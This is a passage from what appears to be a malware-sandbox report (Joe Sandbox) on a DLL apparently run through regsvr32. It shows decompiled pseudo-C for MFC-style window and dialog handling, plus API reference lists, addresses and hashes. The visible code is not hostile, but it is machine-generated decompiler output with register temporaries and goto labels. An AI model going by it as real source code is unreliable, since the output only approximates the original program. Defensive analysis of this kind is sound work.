																				_t174 = E10013FEA(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				L10032C5C(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E10017D72(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E1001B7D4(_t255, _v36, _t229);
																			} else {
																				_t191 = E10013FEA(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				L10032C5C(_t244);
																				L10032E26(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = L10032BF1(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = L10032FA7(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E100178C1(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1001795E(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E100179BB();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = L10032EA1(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = L10032AFB(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E10033257(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		L1002C8CD(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E10013FEA(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	L10032DB9(_t232, E10013FEA(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															L10032E26(_t229, _t232, _t260, _v24, E10013FEA(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																L10032FD4(_a4, _v24, E10013FEA(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E10047725(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E10017D72(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x10033257
0x10033258
0x1003325a
0x1003325b
0x1003325f
0x10033260
0x10033261
0x10033268
0x1003326d
0x10033271
0x10033273
0x1003327b
0x1003327f
0x10033281
0x10033286
0x10033289
0x1003328b
0x1003328f
0x1003328f
0x10033297
0x10033299
0x1003329e
0x00000000
0x00000000
0x100332a8
0x100332b8
0x00000000
0x00000000
0x100332ba
0x00000000
0x00000000
0x00000000
0x00000000
0x100332a8
0x100332bc
0x100332bc
0x10033289
0x1003327f
0x100332be
0x100332be
0x100332c0
0x100332cc
0x100332d2
0x00000000
0x00000000
0x100332d5
0x100332dc
0x100332dd
0x100332ef
0x100332f1
0x10033314
0x10033314
0x10033317
0x10033347
0x1003334c
0x1003334d
0x10033354
0x10033359
0x1003335c
0x1003335e
0x10033368
0x10033360
0x10033360
0x10033360
0x1003336b
0x1003336e
0x10033371
0x1003337b
0x1003337e
0x10033383
0x10033388
0x1003338a
0x1003338d
0x10033397
0x1003339d
0x100333a0
0x00000000
0x00000000
0x00000000
0x00000000
0x1003338f
0x1003338f
0x10033395
0x100333a6
0x100333a6
0x100333a8
0x10033455
0x10033457
0x10033459
0x1003345c
0x10033461
0x10033464
0x1003346a
0x1003346a
0x1003346c
0x10033473
0x100334fd
0x10033502
0x10033506
0x10033509
0x10033646
0x10033649
0x00000000
0x1003364f
0x1003364f
0x10033652
0x10033702
0x00000000
0x10033658
0x10033658
0x1003365b
0x10033709
0x1003370d
0x10033712
0x10033714
0x00000000
0x1003371a
0x1003371a
0x1003371e
0x10033721
0x10033723
0x1003372c
0x10033725
0x10033725
0x10033725
0x10033731
0x10033733
0x10033735
0x00000000
0x1003373b
0x1003373b
0x1003373f
0x10033741
0x10033745
0x10033745
0x1003374a
0x1003374e
0x1003375e
0x10033760
0x10033762
0x1003376f
0x10033775
0x10033764
0x10033765
0x10033765
0x1003377a
0x1003377c
0x1003377e
0x00000000
0x10033784
0x1003378a
0x1003378d
0x10033790
0x10033795
0x10033798
0x100337a5
0x100337a5
0x00000000
0x10033798
0x10033750
0x10033750
0x10033756
0x00000000
0x10033756
0x1003374e
0x10033735
0x10033661
0x10033661
0x10033664
0x00000000
0x00000000
0x00000000
0x00000000
0x10033664
0x1003365b
0x10033652
0x00000000
0x1003350f
0x1003350f
0x1003369e
0x1003369e
0x1003369e
0x00000000
0x10033515
0x10033515
0x10033518
0x00000000
0x1003351e
0x1003351e
0x10033521
0x100335c0
0x100335c2
0x00000000
0x100335c8
0x100335ca
0x100335d0
0x100335d5
0x100335d8
0x100335db
0x100335e0
0x100335e5
0x100335e7
0x00000000
0x100335ed
0x100335ed
0x100335f1
0x10033606
0x10033608
0x1003360a
0x10033618
0x1003361a
0x1003360c
0x1003360d
0x1003360d
0x1003361f
0x10033621
0x10033623
0x1003362c
0x10033631
0x1003363a
0x10033640
0x10033640
0x100335f3
0x100335f3
0x100335f9
0x100335fb
0x100335fb
0x00000000
0x100335f1
0x100335e7
0x00000000
0x10033527
0x10033527
0x1003352a
0x1003366a
0x1003366a
0x1003366c
0x00000000
0x10033672
0x10033675
0x1003367a
0x1003367c
0x1003367d
0x1003368e
0x1003367f
0x1003367f
0x10033682
0x10033684
0x10033684
0x10033693
0x10033695
0x10033697
0x1003369a
0x100336b5
0x100336b5
0x100336b7
0x100336bc
0x100336be
0x100336cc
0x100336cf
0x00000000
0x100336d5
0x100336d5
0x100336d6
0x100336d7
0x100336d8
0x100336da
0x100336df
0x100336e0
0x100336e3
0x100336eb
0x00000000
0x100336eb
0x100336c0
0x100336c1
0x00000000
0x100336c1
0x1003369c
0x100336a0
0x100336ab
0x100336ad
0x100336af
0x00000000
0x00000000
0x00000000
0x00000000
0x100336af
0x1003369a
0x00000000
0x00000000
0x00000000
0x00000000
0x1003352a
0x10033521
0x10033518
0x1003350f
0x00000000
0x10033479
0x1003347a
0x1003347a
0x1003347b
0x100334a7
0x100334ab
0x100334b0
0x100334b7
0x100334bd
0x100334bd
0x100334c1
0x100334c5
0x100334cb
0x100334cb
0x100334cf
0x00000000
0x100334d5
0x100334d5
0x100334dc
0x100334e1
0x100334e3
0x00000000
0x100334e5
0x100334e5
0x100334e8
0x100334ea
0x00000000
0x100334ec
0x100334ed
0x100334ef
0x100337ab
0x100337ab
0x100337ab
0x100334ea
0x00000000
0x100334e3
0x100334c7
0x100334c7
0x100334c9
0x00000000
0x00000000
0x00000000
0x00000000
0x100334c9
0x100334b9
0x100334b9
0x100334bb
0x00000000
0x00000000
0x00000000
0x00000000
0x100334bb
0x1003347d
0x1003347d
0x10033480
0x10033530
0x10033530
0x10033533
0x10033539
0x10033541
0x10033547
0x10033549
0x1003354c
0x10033557
0x1003355c
0x1003355f
0x1003356a
0x1003356f
0x1003356f
0x1003355f
0x1003354c
0x10033570
0x10033579
0x1003357b
0x1003357d
0x10033591
0x10033597
0x1003359b
0x1003359d
0x1003359f
0x100335b0
0x100335b0
0x1003359f
0x100335b5
0x10033486
0x10033486
0x10033489
0x1003349c
0x1003349c
0x100334a1
0x00000000
0x00000000
0x00000000
0x00000000
0x1003348b
0x1003348d
0x10033493
0x10033496
0x00000000
0x00000000
0x00000000
0x00000000
0x10033496
0x10033489
0x10033480
0x1003347b
0x100333ae
0x100333b4
0x100333b6
0x100333b6
0x100333ba
0x00000000
0x00000000
0x100333c2
0x100333c7
0x100333ca
0x100333d7
0x100333d9
0x100333db
0x00000000
0x00000000
0x100333db
0x00000000
0x100333ca
0x100333dd
0x100333df
0x10033404
0x10033404
0x1003340b
0x1003341b
0x1003341b
0x1003341d
0x00000000
0x1003341f
0x1003341f
0x10033422
0x10033424
0x00000000
0x10033426
0x10033429
0x1003342d
0x10033431
0x1003343c
0x1003343c
0x10033440
0x00000000
0x10033442
0x10033442
0x10033449
0x00000000
0x00000000
0x00000000
0x00000000
0x10033449
0x10033433
0x10033433
0x1003343a
0x1003344b
0x1003344b
0x00000000
0x00000000
0x00000000
0x1003343a
0x10033431
0x10033424
0x1003340d
0x1003340d
0x10033410
0x00000000
0x10033412
0x10033412
0x10033419
0x10033452
0x10033452
0x00000000
0x00000000
0x00000000
0x00000000
0x10033419
0x10033410
0x100333e1
0x100333e1
0x100333e4
0x100333e6
0x00000000
0x100333e8
0x100333e8
0x100333ec
0x00000000
0x100333ee
0x100333ee
0x100333f4
0x100333f7
0x100333fa
0x100333fc
0x00000000
0x100333fe
0x100333fe
0x100333fe
0x100333fc
0x100333ec
0x100333e6
0x100333df
0x00000000
0x00000000
0x00000000
0x10033395
0x100335bd
0x10033319
0x10033319
0x1003331e
0x10033321
0x10033326
0x00000000
0x00000000
0x00000000
0x00000000
0x10033326
0x100332f3
0x100332f3
0x100332f8
0x100332ff
0x100332fa
0x100332fa
0x100332fa
0x10033303
0x00000000
0x10033305
0x1003330e
0x10033328
0x10033328
0x1003332b
0x00000000
0x1003332d
0x1003332d
0x10033330
0x10033332
0x10033332
0x10033335
0x10033336
0x1003333c
0x00000000
0x00000000
0x00000000
0x00000000
0x1003333c
0x10033310
0x10033310
0x10033310
0x10033340
0x10033344
0x10033344
0x1003330e
0x10033303
0x100332df
0x100332df
0x100332e9
0x100332ed
0x00000000
0x00000000
0x00000000
0x00000000
0x100332ed
0x00000000
0x100332dd
0x1003333e
0x1003333e
0x00000000

APIs

GetFocus.USER32 ref: 100332AA
IsWindowEnabled.USER32(?), ref: 10033306
__EH_prolog3_catch.LIBCMT ref: 10033354
GetFocus.USER32 ref: 10033374
GetParent.USER32(?), ref: 100333BF
GetParent.USER32(?), ref: 100333CF
GetKeyState.USER32(00000012), ref: 1003348D
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10033541
GetFocus.USER32 ref: 10033554
GetFocus.USER32 ref: 10033561
IsWindow.USER32(?), ref: 10033579
GetFocus.USER32 ref: 10033585
IsWindow.USER32(?), ref: 1003359B
GetFocus.USER32 ref: 100335A1
GetKeyState.USER32(00000010), ref: 100335CA
MessageBeep.USER32 ref: 100336C1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
Instruction ID: d662ab5222291105f51a5311d2acb9bc16b1c6a0e98c36f1c822bc35365c2189
Opcode Fuzzy Hash: 24ff8eb11f4b22da7dd3a85a51e3518b23e58b2ea24e9437b63622b344030637
Instruction Fuzzy Hash: 0AF18075900656AFDB23DB60C8C5AAE7BF5EF44292F11C029E846AF361DB34ED81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100139B0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E100139B0(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E100177F8(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t121 =  *(_t58 + 0x20);
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10011243(_t121, E100111D8(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = L10012730();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10011243(_t121, E100111D8(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E10017C59(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x100139b0
0x100139b0
0x100139b7
0x100139ba
0x100139c2
0x100139c5
0x100139ca
0x100139d8
0x100139ea
0x100139da
0x100139dd
0x100139dd
0x100139f0
0x100139f4
0x10013a00
0x10013a08
0x10013a0a
0x10013a0a
0x10013a08
0x100139cc
0x100139cc
0x100139cc
0x10013a0c
0x10013a1a
0x10013a23
0x10013ac3
0x10013aca
0x10013ad1
0x10013adb
0x10013a29
0x10013a2b
0x10013a30
0x10013a3b
0x10013a44
0x10013a44
0x10013a3b
0x10013a48
0x10013a4f
0x10013a90
0x10013a9f
0x10013aac
0x10013a51
0x10013a51
0x10013a58
0x10013a5a
0x10013a5a
0x10013a6a
0x10013a7d
0x10013a87
0x10013a87
0x10013a4f
0x10013aea
0x10013aef
0x10013af4
0x10013af8
0x10013afb
0x10013b02
0x10013b0a
0x10013b12
0x10013b1a
0x10013b21
0x10013b26
0x10013b32
0x10013b3a
0x10013b3a
0x10013b28
0x10013b28
0x10013b28
0x10013b40
0x10013b4f
0x10013b57
0x10013b57
0x10013b42
0x10013b42
0x10013b42
0x10013b6f

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

GetParent.USER32(?), ref: 100139DD
SendMessageA.USER32 ref: 10013A00
GetWindowRect.USER32 ref: 10013A1A
GetWindowLongA.USER32(00000000,000000F0), ref: 10013A30
CopyRect.USER32(?,?), ref: 10013A7D
CopyRect.USER32(?,?), ref: 10013A87
GetWindowRect.USER32 ref: 10013A90
CopyRect.USER32(?,?), ref: 10013AAC

Strings

(, xrefs: 10013A48

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
Instruction ID: cdef7b8ec397d2e35f5d148a9b825cf63a8d49ca7f47ea8acb5fdff55329149a
Opcode Fuzzy Hash: 7d36992815b7c82f4186bf24b3e9f02ba7339f80983b16d8183d78d4b2b26388
Instruction Fuzzy Hash: 02516F72900219AFDB00CBA8CD85EEEBBB9FF48250F154155F915FB291DB30ED818B50

Uniqueness

Uniqueness Score: -1.00%

Function 10036498 Relevance: 24.2, APIs: 16, Instructions: 189
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10036498(intOrPtr* __ecx, void* __ebp, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				char _t60;
				int _t62;
				int* _t64;
				int _t67;
				struct HWND__* _t70;
				struct HWND__* _t76;
				struct HWND__* _t81;
				struct HMENU__* _t83;
				signed int _t92;
				intOrPtr* _t100;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				void* _t113;
				int* _t122;
				intOrPtr* _t123;
				void* _t124;
				signed int _t130;
				signed int _t148;

				_t124 = __ebp;
				_t107 = __ecx;
				_t122 = _a8;
				_t103 = 0;
				_t132 = _t122;
				_t123 = __ecx;
				if(_t122 != 0) {
					L2:
					_t58 =  *((intOrPtr*)( *_t123 + 0x140))();
					_v4 = _t58;
					if(_t58 == _t103) {
						goto L1;
					} else {
						if(_a4 != _t103) {
							_t100 = _t58 + 0x80;
							if( *_t100 != _t103) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t100)) + 0x5c))(_t103);
							}
						}
						_t60 =  *((intOrPtr*)(_t123 + 0x88));
						_push(_t124);
						_a8 = _t103;
						_v12 = _t60;
						if(_t60 == _t103) {
							L16:
							_t122[2] = _a8;
							if(_a4 == _t103) {
								 *(_t123 + 0xb4) = _t103;
								_t62 = GetDlgItem( *(_t123 + 0x20), 0xea21);
								__eflags = _t62;
								_a4 = _t62;
								if(_t62 != 0) {
									_t76 = GetDlgItem( *(_t123 + 0x20), 0xe900);
									__eflags = _t76;
									if(_t76 != 0) {
										SetWindowLongA(_t76, 0xfffffff4, 0xea21);
									}
									SetWindowLongA(_a4, 0xfffffff4, 0xe900);
								}
								__eflags = _t122[1];
								if(_t122[1] != 0) {
									InvalidateRect( *(_t123 + 0x20), 0, 1);
									SetMenu( *(_t123 + 0x20), _t122[1]);
								}
								_t64 = _v4 + 0x80;
								__eflags =  *_t64;
								if( *_t64 != 0) {
									 *((intOrPtr*)( *( *_t64) + 0x5c))(1);
								}
								 *((intOrPtr*)( *_t123 + 0x148))(1);
								_t67 =  *_t122;
								__eflags = _t67 - 0xe900;
								if(_t67 != 0xe900) {
									_v0 = GetDlgItem( *(_t123 + 0x20), _t67);
								}
								ShowWindow(_v0, 5);
								 *(_t123 + 0x60) = _t122[5];
								_t70 = L10034CE4(1);
								L36:
								return _t70;
							}
							 *(_t123 + 0xb4) = _t122[4];
							L10034CE4(_t103);
							_t81 = GetDlgItem( *(_t123 + 0x20),  *_t122);
							_v0 = _t81;
							ShowWindow(_t81, _t103);
							_t83 = GetMenu( *(_t123 + 0x20));
							_t122[1] = _t83;
							if(_t83 != _t103) {
								InvalidateRect( *(_t123 + 0x20), _t103, 1);
								SetMenu( *(_t123 + 0x20), _t103);
								_t33 = _t123 + 0xd0;
								 *_t33 =  *(_t123 + 0xd0) & 0xfffffffe;
								_t148 =  *_t33;
							}
							_t122[5] =  *(_t123 + 0x60);
							 *(_t123 + 0x60) = _t103;
							E10035469(_t123, _t148, 0x7915);
							if( *_t122 == 0xe900) {
								L22:
								_t70 = _a4;
								goto L23;
							} else {
								_t70 = GetDlgItem( *(_t123 + 0x20), 0xe900);
								L23:
								if(_t70 != 0) {
									_t70 = SetWindowLongA(_t70, 0xfffffff4, 0xea21);
								}
								goto L36;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t113 = _t123 + 0x84;
							_t106 =  *((intOrPtr*)(E10012115( &_v12)));
							if(_t106 == 0) {
								break;
							}
							_t92 = GetDlgCtrlID( *(_t106 + 0x20)) & 0x0000ffff;
							_v8 = _t92;
							if(_t92 - 0xe800 <= 0x1f) {
								_t130 = 1 << _t92 - 0xe800;
								if( *((intOrPtr*)( *_t106 + 0x154))() != 0) {
									_a8 = _a8 | 1;
								}
